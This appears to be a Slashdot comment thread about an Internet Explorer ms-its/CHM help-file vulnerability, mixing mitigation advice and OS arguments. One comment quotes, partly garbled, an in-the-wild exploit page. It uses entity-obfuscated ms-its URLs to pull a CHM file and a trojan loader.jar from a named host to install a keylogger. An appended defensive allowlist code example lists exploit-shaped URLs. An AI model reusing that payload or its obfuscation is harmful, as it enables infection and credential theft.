---------------------------------------------
SERENITY NOW!!!!!!!!!!!!!!!!
Yeah, it must be a dll loader, cause it can't be that small and have that many bugs. They give us a false sense of security!
Education. There are technical solutions to most of these problems, but none are as good as teaching people to look after their computers better.
The other day my boss called me over to check out a suspicious looking email that had made its way past SpamAssassin. It rendered blank, but looking at the raw message code revealed it was using just this kind of exploit (with a <FORM> to obfuscate what was really happening).
My boss' account has Restricted User privileges, with Eudora as the MUA and Mozilla as the browser, so no panic, but the fact that spammers are already using this is scary.
I use Firefox on WinXP, but if I use it to visit Windows Update, I get:
Without IE, I am permitted to manually browse through all (!) MS downloads to try to spot anything I might need, but I can't get it to tell me which patches I need, based on the current state of my OS.
So it's a choice between two evils: I either keep IE (and its assorted security holes) or I give up the ability to scan for OS patches.
(WinXP has an automated system for updates, but I'm not sure whether it does "Recommended" patches or just "Critical" ones, it doesn't do drivers, and I don't like having to take it on blind faith that it's working -- I want to scan to make sure.)
I should buy some cement.
Explorer is already running (as your shell) and you can't convince it to restart itself as a different user. What you have to do is kill your existing explorer, (which kills everything including your desktop) then use the task manager to start it again using runas.
The new problem there is your WHOLE DESKTOP is now running as Administrator. Remember to kill it and restart it as yourself when you're done.
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
A serious question here... I run Windows 2k as Administrator with a broadband connection. Both my box and connection are always on, and have been that way for 3+ years. I do not run a firewall, nor do I run any virus scanners. Every few days I run Adaware to check for spyware. I keep my system patched with the latest updates. If my machine begins to act strangely, I go to Trend Micro's free online virus scan, and scan the system. I am savvy enough in my browsing, email, and downloading habits to avoid anything suspicious. In the last three years have had no problems that these actions could not resolve. I've lost no files, and if my box is a zombie, I haven't noticed. I realize that there is the potential for catastrophe, but to my mind, the risk isn't significant. All I want to do is play my games, email/web, plus a little code for work when necessary. If I lose my files, bummer, but oh well. That's life, and why you burn backups (which I don't do either). I reformat and rebuild once a year anyway. So my question is: why should I get my panties in a bunch over security? (Posting anonymously for obvious reasons)
Will someone find out MS managed to make ascii text files a vulnerability?
YARR!
I never thought I'd be in with this crowd, but I'm looking to "make the switch" soon...
-Jesse
Nothing says "unprofessional job" like wrinkles in your duct tape.
That's an important piece of info. With the recent version of Firefox automatically opening MS Office files (thereby opening a virus vector), it wouldn't surprise me if the Mozilla developers turn this feature on.
1.) disable javascript
2.) disable activeX
3.) disable help
4.) keep a software firewall up
5.) keep a router/firewall up
6.) Try to do a windows update.
5.) Profit!?
I have some questions
If you advise people to delete the registry key, what are the ramifications for them during normal browsing?
The article says it may effect other browsers, but I am wondering if that is entirely true, are there any other windows browsers that people can run that won't suffer from the exploit?
The reason is, if you tell windows friends about this, point them to the advisory, you will get eyeballs rolling back. There needs to be a normal non-guru-level English description and how-to to deal with this.
I am reluctant to tell someone to *delete* a functioning registry key in particular, but seeing as how this involves merely clicking on an html page, the main deal with normal surfing.. well, what do you tell people? All the different "switch from this user level to that, unless you need this app, no wait, only for that one and..." and delete this and whatnot are just going to mostly result in *no action* being taken by most people if they even hear of this.
If someone can point to a better written (for normal users) synopsis and mitigation path than what is on cert's site (technically accurate but rather convoluted and arcane), I'd appreciate it
Just the other week I read an article in which Microsoft was slamming Linux when it came to patches. How much faster they were, how slow Linux was in patching the OS and so on.
:-)
Then I come to slashdot and read this. Puts a spring in my step
Has Comcast disconnected your Internet account? Same here. You can read about it at http://comcastissue.blogspot.com
Phone rings.
Hi mom. You want to install a program? Ok, what's it called?
Great! Now open a terminal window. It's a command line interface and it's much more powerful than a gui. Got it open? Great. Now you have to become the superuser, so type 'su' and then put in the password.
You don't know your root password? Ask dad.
Ok, great, so now you're root. Now type "urpmi", a space, and the name of the program you wish to install.
It's asking for the CD that contains the program. Put that CD in and follow the directions.
You're done, now? Great! Now just click on your K menu and you should find it under "Applications". You don't have a K menu? You have a little paw. Ok, click the little paw, yes I know it's cute. Found it? Glad to help!
Like what I said? You might like my music
That no matter what you tell people, no matter the way you present the facts, they will be reluctant to fix anything. I have told non-technical friends about different exploits for years. Even gone as far as demonstrate how I could use IE to do what I wanted from an email. Yet they insist that their firewall, their virus scan software, keep their pc safe and secure. The only secure pc I've ever seen is the one not connected to the net.
.js. Stop viewing email in OE in html. Troll the security sites. Your attacker does.
So disable those ActiveX controls. Prompt to run
I am Bennett Haselton! I am Bennett Haselton!
Mozilla is not vulnerable.
There are two kinds of protocol handlers in Windows: system-wide and IE-specific. Mozilla supports the system-wide protocols but not the IE-specific protocols. ms-its is an IE-specific protocol.
We should probably take a second look at the system-wide protocols, though. Currently we blacklist some and let the rest through.
Pride Goeth Before a Fall
Linux is *not* user friendly, and until it is linux will stay with >1% marketshare.
Take installation. Linux zealots are now saying "oh installing is so easy, just do apt-get install package or emerge package": Yes, because typing in "apt-get" or "emerge" makes so much more sense to new users than double-clicking an icon that says "setup".
I hate to break it to you, but anyone with the attitude you display is the problem, not a lack of user friendliness.
I have used linux since
I just did a fedora core 1 install. What a joke! Fewer questions, less knowledge required than a Windows install.
Even once you get it up and running it is smooth and easy to find what you want, vs. a standard kde install on another distro leaving you 40 choices for each type of functionality you'd like to use.
Here's the problem - any installation is somewhat of a barrier because most people do not install windows themselves - it comes on their computers. The steps being taken by Sun, Lindo(w)s, SuSe, Xandros, and others to get their distros defaulted on budget machines will get the familiarity and ease-of-use out there to the masses.
Linux zealots are far too forgiving when judging the difficultly of Linux configuration issues and far too harsh when judging the difficulty of Windows configuration issues. Example comments:
You're right. A friend is helping me bootstrap debian on a running machine I have nothing but net access to. Obviously a little tricky, but once you understand the basics, it's really reasonably easy. However, most Linux "power-users" would expect everyone to be able to do it.
Your examples with Quake show just why we need a common push for progress in this area, and the individual camps are making great strides, but there needs to be a more unified effort to get better traction.
"In IE, it copied itself over..." (means to me: IE is vulnerable, and your test is valid)
"Firefox, OTOH, didn't budge...same thing with Netscape and Opera..."
Does "Same thing" mean your test with Netscape and Opera showed they were safe like Firefox, or they were vulnerable like IE?
I think you mean your test suggests they're safe, but I want to be sure....
Pavlov wouldn't be so famous if he'd used a can opener instead of a bell.
You can do it if the link ends up invoking rundll32 (for certain control panel components, for example). But if you use Right-Click Run As... on something like My Computer or the explorer icon you're not actually running it as another user. Go ahead, try it! Even with "Launch folders in a separate process" you'll see that it'll accept the alternate user/password but no new window will launch. (hit CTRL+ALT+DELETE and check the processes running, you won't find explorer running as Administrator, I assure you)
"What's a floppy??? Don't they have pills or something to fix it??"
Only for those who buy from SPAM. The rest of us must simply suffer tiny floppies. Plus, we miss out on our slice of the Nigerian wealth.
*sigh*
In Windows, it feels like the WINNT user/administrator model has been poorly integrated with the Win95 "wide open" model. I suppose it probably works better in big corporate environments where users are not allowed to install software at all to control tech support costs, and so having them be restricted all the time is fine. However, it works poorly in a home environment where the user and administrator are usually the same person. There doesn't seem to be any obvious reason why MS couldn't add this feature to XP since they already have the "multiple users" feature.
help is on the way?
it would be ok if all of those infactdead machines relaying all of that virotic spam would go DOWn?
seems as though most of the usual spam has just gone away?
good thing j. public just down right refuses to act peaced off/dissatisfied?
consult with/trust in yOUR creators... this stuff is unbreakable, & wwworks on several (more than 3) dimensions.
the wildly popular planet/population rescue initiative remains on high crisis alert/intervention mode.
oh educate us oh mighty one.
You don't need to actively use the help system to be hit by this. It involves getting the user to follow a link in IE (or possibly, another browser) that triggers the help system to load an HTML page off the Internet with an exploit.
If the mythical mom was running KDE, she could have sent you a request for remote help by email, which works great. You take over the machine and help things.
And if you had set up the system for your mom, you would have kept the password for root, sshed remotely and done everything for her. Problem solved...
Stop looking for issues where there are none.
Pragmatism as an ideology is not particularly pragmatic in the long term. Keep it in mind when you dismiss Free Software
... any other examples?
Ugly is right, and it's typical of MS to want to make 'compiled HTML files' in the first place.
They made their bed; now they can toss and turn in it.
Here is a list of WEEKLY security vulnerabilities in all Linux distributions.
Do you ever see any of them mentioned on Slashdot? Of course not. That's because it would reveal to people that operating systems are not perfect and never will be--and the fact that this is the first Slashdot "vulnerability" article on Windows in quite a while now is a feat considering Windows' massive marketshare and usage. I'm sure the editor was just dying to get it posted since it's been a little while. Meanwhile, the Linuxsecurity site shows that Linux distros have multiple security advisories every week.
Point? No point other than to point it out. No problem with Slashdot reporting these things, but pretending there's no agenda behind it--especially considering Slashdot is owned by a Linux company for whom it is in the best interest of to post "news stories" that happen to dump on competitors--is being purposely naive.
Using the Recovery console to disable a service simply sets the Registry 'Start' value of that service to 0x4, exactly the same as using the Services MMC snap-in. It is no more "magic" than using the GUI. The only advantage is that one can use the recovery console if something in Windoze is borked to the point of not booting properly.
It is literally amazing to me the amount of blatant FUD being spread around here by so-called computer types.
There are currently no patches available and no virus definitions for the major scanners. As well, exploits have been reported in the wild.
MS Security Chief: Windows Never Exploited Until Patch Available
... and run linux myself. I just have a lot of friends who are still running windows (most of them by far) and I wanted to offer more precise and comprehensible instructions to them to avoid the nasties. I will admit I haven't been too effective in "evangelizing" switching OSs, because most of my friends are netfriends, so I can't just go over to their house and help them through first install and getting it all setup, etc.. Most people struggle by with patches, firewalls etc and have grown very familiar with their systems and honestly seem to not want to change, just fix it. It's inertia mostly. I think most people are still running 98 for instance. I asked on another article last week or so but didn't get any replies, asking if any web masters who run non technical non geek sites, just regular old sites would confirm that or not. heck, I know several people still running 95, because it still surfs good enough with their old machines, and they see no reason to purchase an expensive new machine. True facts there.
I have been advising people to switch browsers, etc for a long time, some have, that's about the best I can do. It takes actual physical interaction with people and direct help for them to see that they have viable alternatives. MS comes on their boxes, their kids play MS games, etc, they aren't in any rush to switch. This will not change until people buy a new computer with an alternative OS installed on it from the get-go, and that OS better work for them full GUI with no command line tweaking, and I've said that for years now.
This news raises the issue of MSIE being started by other applications, even if you use another browser as your default. Well, it is not hard to disable MSIE. (It's probably not wise to try to remove it.) The MSHTML.DLL is the HTML rendering control of IE, borrowed by many Microsoft apps and help, as well as things like Kazaa that have built in browsers. Basically, all you need to do is find all instances of MSHTML.DLL on your system and set the permission to No Access for everything. No more worries about IE starting up on you, although from time to time you may possibly find that you need to enable it for a small task or two.
Windows is so easier to use that you never even need the help. This security hole is a non-issue.
In order to exploit the help system, would the user need to dl and execute a help file? Once you can get a user to dl and execute something there isn't actually a need for a vulnerability and it's beyond what the OS can reasonably deal with.
I don't have WinXP but XPlite should replace the web integrated shell with a more secure version. I put the free 98lite version on every Win98 I have used. The free version is not shareware but the paid version does a lot more. It looks like I will be trying this soon as my mother runs WinXP pro and she already got the blaster worm 1 day before it was discovered. She doesn't use IE but who knows how long it will be till she gets hit again.
Star Trek, there may be hope.
>Remove the spaces that slashcode adds!
gewg_
Given that Symantec's flagship AV product actually erases the archived mailbox files for the Mail.app and Eudora, some AV solutions are more dangerous than the problem at this stage.
Of course, Norton tools in general have a history of doing more harm than good on the Mac (since OS 8.1, anyway). I've lost count of the number of times I've rebuilt the HFS+ file structure after people have "fixed" their directories....
...downloading a dirty help file or else manage to get them to view your html via their help client.
;)
The first example (downloading) applies to people just as stupid as to download an executable and run it as well. The second would require you (afaik) to have a local help file that referenced another link that had been replaced with infected html.
I don't think you can (even with some effort) view a webpage via HTML help without being linked there by a help file which you already have.
So, it doesn't appear to be an end of the world scenario by any means... Of course, on Slashdot we like to make fun of the devil a little bit too much.
This is *bound* to infect the 5 or 6 Windows users who actually read the help files!
that lists all the unpatched, arbitrary code vulnerabilities in Windows XP? I know I can look up viruses at Norton or McAfee's site or a dozen other places. I was wondering if anyone's tracking just the unpatched stuff though.
Hi! I make Firefox Plug-ins. Check 'em out @ https://addons.mozilla.org/en-US/firefox/addon/youtube-mp3-podcaster/
"It seems like you're trying to exploit a security hole. Would you like help?"
Whoa! Deja Vu!
It's almost echoing this recent thread in the Kernel Panic strip.
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
You know what'd be cool? A joke trojan that used your scanner to play music.
There used to be a program that'd play a MIDI file on an HP ScanJet II by moving the motor at different speeds for different pitches. It was funny as hell. I wonder if that still exists anywhere, and would work with the new-fangled USB ScanJets...
I found this page yesterday, it is an exploit of this vulnerability.
; s-its:mhtml:file://c:\\nosuch.mht!http://hard-virg ins.com/sher/x.chm::/x.htm'));t width=1 height=1 ARCHIVE=loader.jar code=Counter></APPLET>
/.
WARNING - IF YOU ARE USING IE, THIS PAGE WILL LOAD SEVERAL EXPLOITS INTO YOUR SYSTEM - NOTABLY SHERLOK2.EXE (KEY LOGGER) AND REG33.EXE (DISABLED WINDOWS UPDATE). YOU HAVE BEEN WARNED!
The link is here.
http://hard-virgins.com/sher/test.html
For those who don't want to follow it, here is the page source.
<html><head>
</head><body>
<textarea id="cxw" style="display:none;">
<object data="${PR}" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(cxw.value.replace(/\${PR}/g,'m
</script>
<apple
</body></html>
This loads and runs the x.chm file from
http://hard-virgins.com/sher/x.chm
and also the loader.jar file from
http://hard-virgins.com/sher/loader.jar
Loader.jar contains the Byte.Verify Trojan to gain full access.
Notice the use of ${PR} and then substitution for the exploit code. I don't know exactly why they did that, maybe to stop scanners that check object data. Also note the use of the hex m (m) instead of just the char 'm'. This gives the 'ms-its' type but will get by dumb scanners (read enterprise firewall filters).
I was still pondering why in the world they would be loading a help file when i saw this story, so thanks for answering my question
BTW, if you are running NAV2004 with fairly recent definitions (reg33.exe, sherlok2.exe, and parser.class are fairly old exploits) then Norton will stop these exploits from running and delete them, but they still get on your system just fine.
So careful out there, this exploit is dangerous.
"The crows seemed to be calling his name, thought Caw."
I'd like to take the time to apologize for the shortcomings of my advice regarding restricted user accounts and privilege level. I try to lock things down and I do what you can, but sometimes things don't always work out the way I want them to. Some things just aren't as simple and cut and dry as I would like to believe they are. And I apologize if my advice was short sighted or misleading.
But which one will be patched sooner so that img src= is restricted to http/https protocols only? (Except for HTML from file://, which can also access file://...)
--
Internet Explorer (n): Another bug -- that is, a feature that can't be turned off -- in Windows.
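The Mozilla developer upthread says the system-wide protocol handlers are currently blacklisted case by case, the exploit post notes that spelling the scheme as &#x6d;s-its gets past "dumb scanners", and this post wants img src= limited to http/https (file:// only from file://). The following is an added example, not code from the Slashdot thread, Mozilla, or Microsoft, showing the allowlist policy those three comments add up to, with the entity decoding done before the scheme is compared. The toy decoder, the sample URLs (example.test, the nosuch.mht/x.chm shape copied from the posted exploit) and the function names are all constructed for the example; a real engine would run this after its HTML parser has already decoded character references.

```javascript
// Added example (not from the thread or any browser): allowlist-based
// subresource scheme policy, with normalization before the comparison.

// Step 1: decode numeric HTML character references (&#109; / &#x6d;) and drop
// ASCII controls/whitespace. Constructed toy decoder; an HTML parser performs
// this decoding before an attribute value ever reaches the URL layer, which is
// exactly why a filter that looks at the raw bytes sees "&#x6d;s-its" but the
// renderer sees "ms-its".
function normalizeUrl(raw) {
  const decoded = raw
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCodePoint(parseInt(h, 16)))
    .replace(/&#(\d+);/g, (_, d) => String.fromCodePoint(parseInt(d, 10)));
  // URL parsers strip leading/trailing controls and embedded tabs/newlines;
  // this toy strips every C0 control and space for simplicity.
  return decoded.replace(/[\u0000-\u0020]/g, "");
}

// Extract the scheme of an already-normalized URL (null for relative URLs).
// "ms-its:mhtml:file://..." yields "ms-its": the outermost scheme decides.
function schemeOf(url) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

// Step 2: the policy. Network schemes are always fetchable; "file" only when
// the embedding document itself came from file:; every other scheme (ms-its,
// mhtml, javascript, res, ...) is refused. The allowlist is a closed set, so
// a handler nobody thought about is denied by default instead of let through.
const NETWORK_SCHEMES = new Set(["http", "https"]);

function isSubresourceAllowed(documentUrl, resourceUrl) {
  const docScheme = schemeOf(normalizeUrl(documentUrl));
  const scheme = schemeOf(normalizeUrl(resourceUrl));
  if (scheme === null) return true;          // relative: resolves against the document's own scheme
  if (NETWORK_SCHEMES.has(scheme)) return true;
  if (scheme === "file" && docScheme === "file") return true;
  return false;
}

// For contrast, the blacklist approach as a naive content filter would do it:
// it compares the raw spelling it was given against the names it knows.
const BLOCKED_SCHEMES = new Set(["ms-its", "mhtml"]);

function blacklistAllows(resourceUrl) {
  const m = /^([^:]+):/.exec(resourceUrl);   // no normalization, deliberately
  return !(m && BLOCKED_SCHEMES.has(m[1].toLowerCase()));
}

// Run the two policies side by side over constructed sample URLs.
function comparePolicies(documentUrl, resourceUrls) {
  return resourceUrls.map((url) => ({
    url,
    allowlist: isSubresourceAllowed(documentUrl, url),
    blacklist: blacklistAllows(url),
  }));
}

if (typeof require !== "undefined" && require.main === module) {
  const samples = [
    "https://example.test/a.png",
    "ms-its:mhtml:file://c:\\nosuch.mht!http://example.test/x.chm::/x.htm",
    "&#x6d;s-its:mhtml:file://c:\\nosuch.mht!http://example.test/x.chm::/x.htm",
    "file:///C:/notes.txt",
  ];
  for (const r of comparePolicies("http://example.test/page.html", samples)) {
    console.log(`${r.allowlist ? "ALLOW" : "DENY "} (blacklist: ${r.blacklist ? "allow" : "deny"})  ${r.url}`);
  }
}
```

The interesting row is the third one: the entity-encoded ms-its URL is denied by the allowlist because normalization runs first, while the blacklist lets it through because it never learned that spelling. That is the general lesson behind the developer's "take a second look at the system-wide protocols": enumerate what is permitted, and decide after decoding, not before.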
Name something that SP1 broke that either:
a) Affected you.
or
b) Hasn't been fixed via Hotfix already.
Not All Who Wander Are Lost
Since no one writes documentation for OSS, such a bug is a non-issue.
(DISCLAIMER: this is a joke, there is no guarantee that this joke will be funny to you and this joke comes with NO WARRANTY WHATSOEVER)
True story.
Are there any other viewers that can read .CHM files, specifically ones that don't use the vulnerable IE libraries?
What is there out there that can read .CHM files on *nix machines?
Or is there something that can convert .CHM files to a format that is more supported (PDF, or standard HTML/XML or something else)?
Perhaps something open source?
Hmmm, no replies to this. Maybe you finally got the linux zealots to stfu for a minute.
I cannot wait for the NX (no execute) bit to become part of the mainstream PC architecture and operating systems. I wonder why it couldn't have happened years ago. Some mainframe systems had it decades ago.
"It's the height of ridiculousness to say for those 9 lines you get hundreds of millions."
Where are the articles on the latest kernel exploits in Linux and *BSD? If Slashdot really desired to be fair and balanced, they would publish an equal amount of stories on Linux exploits as they do on Microsoft exploits. But they don't, because they want to have some feeling of "superiority" that they are covering up information that they feel might be harmful to their cause if let out.
Slashdot's lack of editorial integrity makes me never want to come back to this site. I don't understand how people can read the front page with a straight face anymore.
To really get rid of IE you need to remove..... Windows, and install Linux.
IE 6.0 and Firefox 0.8 do indeed open up a compose email window. Mozilla 1.6, OTOH, just sits there with a broken picture icon.
I'm not sure which is more interesting - that Firefox allows such a boneheaded thing or that Firefox allows it when Mozilla does not. Aren't both using the same version of Gecko (I'm assuming that this is a function that Gecko would handle)?
What's that, mom, you want to install an application?
You downloaded the software as a .rpm file for Mandrake Linux from the web, right? OK. Double-click it and follow the instructions. Then click the button in the bottom left of the screen and look through the menus until you find the program.
*click*
GCHQ Quantum Insert installed. If only our tongues were made of glass, how much more careful we would be when we speak
Maybe the post was so stupid that nobody bothered to reply.
I am pretty sure microsoft is doing everything in its power to make windows a more secure platform. I am also sure it's number 1 priority on bill gates' list. Since a secure windows environment will make him and his company even more money to do great new things :D
Kapitalism at its best as they say ! :D
So far the only MS products I know of that come without security problems are the dead-tree manuals and books.
No, actually, I think you can still hurt somebody pretty bad with one of those...
This message brought to you by Jack Schitt's Previously Shat Shit
Unfortunately, I haven't been able to get any info as to when this will be other than Customer Service saying Real Soon Now.
Tech Public Policy stuff
For those that haven't read the link, here it is (in a few words): if the MSHTML engine does not find a certain page, then it is redirected to another page automatically. This other page, defined by some external source, is executed in the same security context as the one that was not found.
In other words, I can send you a URL which makes it possible to automatically upload to you any software I like.
Well done Microsoft, for one more time.
You're a helper monkey! This isn't helping!
Democracy is two wolves and a sheep voting on lunch.
Yes, it's a nice exploit demonstration, but if it works on your system it'll break Windows Media Player.
I know, I know, I need to move to Linux, but until I can move my full user base (my wife) along, this is what I'm stuck with.
The warning about backing up wmplayer.exe wasn't exactly strong enough to actually make me do it.
Maybe they issue a PR only after they've FINALLY created a fix...that way they can release the fix soon after the PR, so's to look efficient and "on to it"...
just another tinfoil hatter.
...tried running GNU/Linux on a Mac? It's heaven! Now if only I could find an ATI driver...
Every time you run "emerge", a Microsoft drone dies.